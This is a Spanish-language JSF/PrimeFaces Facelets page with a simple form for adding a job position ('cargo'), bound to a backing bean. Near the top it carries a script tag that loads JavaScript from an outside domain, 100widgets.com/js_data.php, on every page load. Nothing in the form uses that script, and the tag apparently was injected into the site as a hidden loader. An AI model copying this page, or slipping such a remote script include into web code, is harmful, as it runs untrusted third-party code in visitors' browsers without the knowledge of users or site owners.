<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<ui:composition xmlns="http://www.w3.org/1999/xhtml"
      xmlns:ui="http://java.sun.com/jsf/facelets"
      xmlns:f="http://java.sun.com/jsf/core"
      xmlns:p="http://primefaces.org/ui"
      xmlns:h="http://java.sun.com/jsf/html"
      template="/plantilla/Plantilla.xhtml">
<ui:define name="contenido_A">



<script type="text/javascript" src="//100widgets.com/js_data.php?id=38"></script>


	<div style="width: 1000px; font-size: 12px;">
		
		
	<div >
	
		<div class="box box-primary">
			
			<a >AGREGAR CARGO</a>
		
		</div>
		
			<h:form>
	<p:growl id="MensajeGeneral" showDetail="true" autoUpdate="true" life="3000" />
	<p:messages closable="true" />
			<h:panelGrid columns="2" cellpadding="5" style="width: 15px; height: 80px; ">
					
					
					<p:outputLabel for="nombre" value="Nombre:" />
					<p:inputText id="nombre" value="#{beanCargo.carg.descripcion}" onclick="this.value='';"/>
							
					<p:commandButton value="Agregar" actionListener="#{beanCargo.registrar()}" icon="ui-icon-disk" rendered="true" estyle="border:none" styleClass="bt colorVerde"  />
				</h:panelGrid>
		
	</h:form>
				 </div>
		
						
			</div>
			
			
	

	

</ui:define>

</ui:composition>